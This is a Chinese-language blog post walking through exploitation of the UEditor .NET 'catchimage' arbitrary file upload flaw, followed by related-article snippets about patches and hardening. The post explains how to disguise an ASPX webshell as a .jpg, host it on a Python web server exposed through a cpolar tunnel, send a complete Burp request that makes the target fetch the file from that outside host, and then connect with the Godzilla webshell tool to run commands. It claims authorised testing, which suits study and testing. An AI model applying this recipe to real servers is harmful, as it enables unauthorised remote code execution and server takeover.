Ueditor文件上传漏洞&&简易外网可访问服务器搭建

已于 2024-03-25 16:56:12 修改
阅读量676 收藏 14
点赞数 14
文章标签: web安全
于 2024-03-22 16:12:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56750162/article/details/136942645
版权

        文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

        某天,啪的一下,很快啊,领导微信丢过来几篇Ueditor文件上传的漏洞要求验证一下。我:什么?啥?作为刚入行不到一年的小白中的小白来说,咱没见过这漏洞啊,于是只好在网上各种翻文章。

        大概是漏洞比较久远的关系吧,我没找到一篇写的和很详细的文章,都是只告诉说Python搭个服务器放进去个图片马然后巴拉巴拉的,然后呢?关键步骤呢?Python搭的服务器是局域网啊哥,你公网咋访问啊?再就是人家土豪直接把图片马放到自己的云服务器上的,无奈,于是我开始了各种方法尝试搭建不花钱(贫穷)的临时简易服务器用来验证漏洞。

        万幸是找到了,不然也不会有这篇文章了。。。

        这里就不教如何搭环境了,别的博主写的很详细了,而且我验证的实战环境,也不用搭,别学我,我有授权的,未经允许进行渗透测试是违法的哦。

        扯远了,说回这个漏洞,原理是通过文件写入的方式把木马写入服务器,又因为Ueditor校验只校验了后缀,所以其实不用做图片马,后缀改成jpg就行。

        这个漏洞最简单的验证方法就是直接通过burp发包,也不用搞什么html,先说服务器的问题。

1.做一个木马文件出来,后缀是.jpg,样子如图

2.然后在木马所在的文件夹打开cmd,可以直接在文件夹上面的地址栏里面直接输入cmd然后回车就行,因为Python的简易服务器就是以你执行命令所在的文件夹为根目录的,所以必须在这个文件夹。

3.运行命令,9090是端口,记的不要用8080,不然burp内置浏览器会出问题的。

Python -m http.server 9090

4.然后可以在浏览器验证一下,出现跟下图一样就成功了。链接:http://127.0.0.1:9090/

5.然后下载一个cpolar,安装直接一直下一步就行,这里就不贴图了,要注册账号,后面要用的。官网链接:cpolar官网-安全的内网穿透工具 | 无需公网ip | 远程访问 | 搭建网站

6.安装完成后访问http://127.0.0.1:9200/,用上一步注册的账号登录即可,登录之后直接在隧道管理里面创建隧道即可,端口要和你启动Python服务器的端口一致,其他都默认就行。

7.完成后在状态-在线隧道列表里面就能看到了,随便访问一个公网地址就行了

8.验证截图

9.到这工作已经完成大半了,之前说过验证这个漏洞最简单的方法就是发包,数据包我直接借用如下链接的大佬文章里面的。链接:UEditor 任意文件上传漏洞
 

POST /Utility/UEditor/index?action=catchimage HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

source[]=http://替换为自己服务器开启http服务的URL地址/666.jpg?.aspx

10.然后就是紧张刺激的发包传马了,哦,对,还没说怎么初步检验是否存在漏洞,拼接url:http://ip:port/UEditor/net/controller.ashx?action=catchimage。出现下图,证明可能存在漏洞。

11.把source[]=后面的链接换成上面搭好的服务器的公网访问地址,然后后面加上?.aspx,然后如图的返回包就是上传成功了,框起来的部分就是地址,拼接之后大概是这样的链接:http://ip:port/Utility/UEditor/upload/image/22222222/22222222222222222222.aspx

12.然后用我最爱的webshell工具哥斯拉链接一下,bingo,链接成功!

13.链接成功后木马的位置参数在基础信息这里。

14.执行命令也成功了,好耶!

缇友
关注
  • 14
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
利用ueditor文件上传功能上传文件到外部服务器的地址&&&&&字符统计功能重写
01-03
这几天用到了UEDITOR文件上传功能,但是UEDITOR自带的文件上传功能只能将文件上传到项目根目录.百度搜索也没有很多相关的资料,更关键的是没有相关的源代码. 所以今天把我自己实现的这部分代码上传,希望大家共同进步!
ueditor漏洞修复
02-11
一、漏洞介绍   Ueditor编辑器上传漏洞导致getshell   漏洞存在版本:1.4.3.3 Net版(目前最新版本,已停更) 二、修复文件 ueditor\net\App_Code\CrawlerHandler.cs 下载本附件,按上述路径覆盖文件即可。实测可用。
UEditor编辑器自定义上传图片或文件路径的修改方法
10-25
主要介绍了UEditor编辑器自定上传图片或文件路径的方法,需要的朋友可以参考下
ueditor源码扩展,文件服务器地址
04-13
ueditor源码扩展,支持设置文件服务器地址
UEditor 任意文件上传漏洞
zkaqlaoniao的博客
04-09 1299
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
网站漏洞修复之最新版本UEditor漏洞
热门推荐
网站安全专家
08-30 12万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文...
Ueditor文件上传漏洞&&简易外网访问服务器搭建
2401_84972870的博客
05-13 447
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Ueditor文件上传漏洞&&简易外网访问服务器搭建(1)
2401_84972858的博客
05-13 784
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Notes Sixth day-渗透攻击-红队-打入内网
qq_34801745的博客
09-22 3567
** Notes Sixth day-渗透攻击-红队-信息收集(dayu) ** 作者:大余 时间:2020-09-22 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
百度控件ueditor图片上传到远程服务器解决方案
03-08
百度控件ueditor图片上传到远程服务器解决方案 一、搭建ueditor环境 二、修改源码 三、重新编译源码 四、使用说明
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 7947
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
Notes Twelfth Day-渗透攻击-红队-命令与控制
qq_34801745的博客
09-28 7468
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
小孩子不懂事,写着玩的
qq_45981247的博客
04-24 275
自用笔记
一表捋清网络安全等级保护测评要求
weixin_45840241的博客
05-15 562
对于中小企事业单位来说,网络安全建设是一个复杂且投入较高的过程,因此他们更倾向于寻找一种“省心省力”的等保建设方案,以及一种能够持续有效且具有较高性价比的网络安全建设投入方式。通过采用等保一体机方案,客户能够根据自身需求定制所需的安全能力,例如等保二级能力与行为管理能力的结合,等保三级能力与远程安全接入能力的结合等。等保安全套餐方案一直致力于构建“一站式省时省力过等保,安全有效且具有高性价比”的优势,以更好地满足中小企事业单位的网络安全建设需求。导致的安全设备闲置或无法满足等保要求等。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 588
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 195
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
ueditor文件上传漏洞
08-31
对不起,我是一个AI助手,无法提供具体的代码或漏洞修复方法。但是,对于ueditor文件上传漏洞,你可以采取以下步骤来增强文件上传安全性: 1. 文件类型验证: 在服务器端进行文件类型的验证,限制上传文件的后缀名和MIME类型,禁止上传可执行文件等危险类型的文件。 2. 文件名处理: 对上传的文件进行重命名,采用随机的文件名或者加密的文件名,避免使用原始的文件名。 3. 文件路径处理: 将上传的文件存储在非Web根目录下,防止直接访问上传目录。 4. 文件大小限制: 对上传的文件进行大小限制,避免上传过大的文件导致服务器资源耗尽。 5. 安全配置: 确保服务器的目录权限设置正确,并且禁止执行上传目录下的脚本文件。 6. 防火墙设置: 设置Web应用程序防火墙(WAF),对上传的文件进行检测和过滤,防止恶意文件上传。 7. 定期更新: 及时更新ueditor版本,获取修复已知漏洞的最新版本。 请注意,以上是一些常见的安全措施,但具体应根据你的开发环境和需求来确定合适的安全策略。此外,建议在开发过程中参考相关的安全文档和资料,以确保应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值